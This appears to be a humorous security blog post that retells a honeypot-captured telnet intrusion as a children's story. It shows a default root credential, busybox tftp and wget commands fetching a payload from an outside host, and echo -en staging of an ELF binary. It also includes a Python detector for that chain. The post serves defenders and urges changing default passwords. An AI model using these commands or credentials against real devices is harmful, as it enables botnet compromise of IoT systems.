Your Fly Is Open

Netmenaces and Other Internet Stupidity

If You Leave a Hacker a Default Password...

2016-06-06 2 min read attacks

In the interest of making security approachable, I’ve decided to attempt to bring proper security methodology down to a level that everyone can understand. Because my four-year-old niece lives with us, we’ve got a ton of children’s books lying around for inspiration. I decided to try passing along a little security knowledge by mimicking the style of the beloved children’s classic, If You Give a Mouse a Cookie.

If you leave a hacker a default password,

An Eeevil Hacker

He’ll use it to log into your telnet server.

He’s in!

Once he’s logged into your telnet server,

host login: root
Password: vizxv

he’ll want to install some new software.

Installing software

He’ll try to download something via TFTP,

# busybox tftp 185.xx.xxx.xxx -c get bin.sh
tftp: applet not found

but that won’t work, so he’ll try WGET.

# busybox wget 185.xx.xxx.xxx -c get bin.sh
wget: applet not found

That won’t work either, so he’ll resort to creating a file all by himself.

# echo -en '\x7f\x45\x4c...\x01\x00\x00\x00\xa4\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
# echo -en '\x01\x00\x34...\x28\x00\x06\x00\x05\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
.
.
.
# echo -en '\x00\x00\x00...\x01\x00\x00\x00\x00\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV

Once he’s created that file, he’ll want to run it.

He wants to run it

Once it’s running, it’ll download another one of the hacker’s files.

Downloading

He’ll want to run that one too.

He wants to run that one too…

Once it’s running, it will start attacking other systems on the Internet.

Attack!

While it’s attacking other systems on the Internet, it might come across Tom’s Telnet Mirror™.

Cat attacking mirror

If the code attacks Tom’s Telnet Mirror™, it’ll redirect the attack right back to your system.

Bounce!

And, chances are, if the attack is reflected right back to your system, it’ll probably try logging in using a default password.

host login: root
Password: vizxv
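The captures above are the whole chain a telnet honeypot transcript records: a login with a factory default, a probe for tftp and wget, a binary written piecewise with echo -en when neither applet exists, and then a run of the staged file. As an added example (my code, not anything from the post), here is a small Python analyser that looks for exactly that chain in a transcript. The sample session is constructed to match the shape of the captures; the host address, file name, byte values and the final chmod-and-run line are made up for the example, and the only credential it flags is the root/vizxv pair shown above (the transcript format, a `# ` prompt and `Password:` lines, is an assumption about how your honeypot logs).

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

ELF_MAGIC = b"\x7fELF"

# Credential pairs to flag. root/vizxv is the pair captured in the post;
# extend the set with the documented factory defaults of the devices you run.
DEFAULT_CREDS = {("root", "vizxv")}

LOGIN_RE = re.compile(r"^\S+ login: (?P<user>\S+)$")
PASSWORD_RE = re.compile(r"^Password: (?P<pw>\S*)$")
CMD_RE = re.compile(r"^#\s+(?P<cmd>.+)$")
FETCH_RE = re.compile(r"\b(?:tftp|wget|curl|ftpget)\b")
# "echo -en '\xNN...' >> file": the fallback used when no download tool exists.
ECHO_RE = re.compile(
    r"echo\s+-en?\s+'(?P<esc>(?:\\x[0-9a-fA-F]{2})+)'\s*>>?\s*(?P<file>\S+)"
)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed transcript in the shape of the session in the post. The host,
# file name, byte values and the final command are made up, not captured data.
SAMPLE_SESSION = r"""host login: root
Password: vizxv
# busybox tftp 203.0.113.10 -c get bin.sh
tftp: applet not found
# busybox wget 203.0.113.10 -c get bin.sh
wget: applet not found
# echo -en '\x7f\x45\x4c\x46\x01\x01\x01\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
# echo -en '\x01\x00\x34\x00\x28\x00\x06\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
# chmod 777 retrieve && ./retrieve
"""


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


@dataclass
class SessionReport:
    findings: list[Finding] = field(default_factory=list)
    # Reconstruction of every file the session assembled with echo -en.
    staged: dict[str, bytearray] = field(default_factory=dict)


def escapes_to_bytes(esc: str) -> bytes:
    """Turn a run of \\xNN escapes into the bytes that echo -en would emit."""
    return bytes(int(h, 16) for h in HEX_RE.findall(esc))


def analyse_session(text: str) -> SessionReport:
    """Walk a transcript line by line and record the stages of the chain."""
    report = SessionReport()
    pending_user = None
    flagged: set[str] = set()
    for n, line in enumerate(text.splitlines(), 1):
        if m := LOGIN_RE.match(line):
            pending_user = m["user"]
            continue
        if m := PASSWORD_RE.match(line):
            if (pending_user, m["pw"]) in DEFAULT_CREDS:
                report.findings.append(
                    Finding(n, "default-credential-login", f"{pending_user}/{m['pw']}")
                )
            pending_user = None
            continue
        m = CMD_RE.match(line)
        if not m:
            continue  # command output ("RCV", "applet not found") carries no signal
        cmd = m["cmd"]
        if FETCH_RE.search(cmd):
            report.findings.append(Finding(n, "download-tool-probe", cmd))
        for e in ECHO_RE.finditer(cmd):
            buf = report.staged.setdefault(e["file"], bytearray())
            buf += escapes_to_bytes(e["esc"])
            # Flag once, as soon as the assembled prefix is an ELF header.
            if e["file"] not in flagged and buf.startswith(ELF_MAGIC):
                flagged.add(e["file"])
                report.findings.append(Finding(n, "elf-staged-via-echo", e["file"]))
        for name in report.staged:
            if f"./{name}" in cmd:
                report.findings.append(Finding(n, "staged-binary-executed", name))
    return report


if __name__ == "__main__":
    for f in analyse_session(SAMPLE_SESSION).findings:
        print(f"line {f.line_no:>3}  {f.kind:<26} {f.detail}")
```

Run it on the sample and you get one finding per stage, in order: the default-credential login, two download-tool probes, the ELF header appearing in `retrieve` after the first echo, and the run of that file. The reconstructed bytes in `report.staged` are what you would hand to a sandbox or hash against your blocklist; a session that stops at the login with a non-default password produces no findings at all, which is the point of the last line of the post.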

With apologies to Laura Numeroff
If you have young’uns, seriously consider buying the original… they’ll love it.
And for Pete’s sake… change those frickin’ passwords, mmmmkay?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter: @tliston
June 6, 2016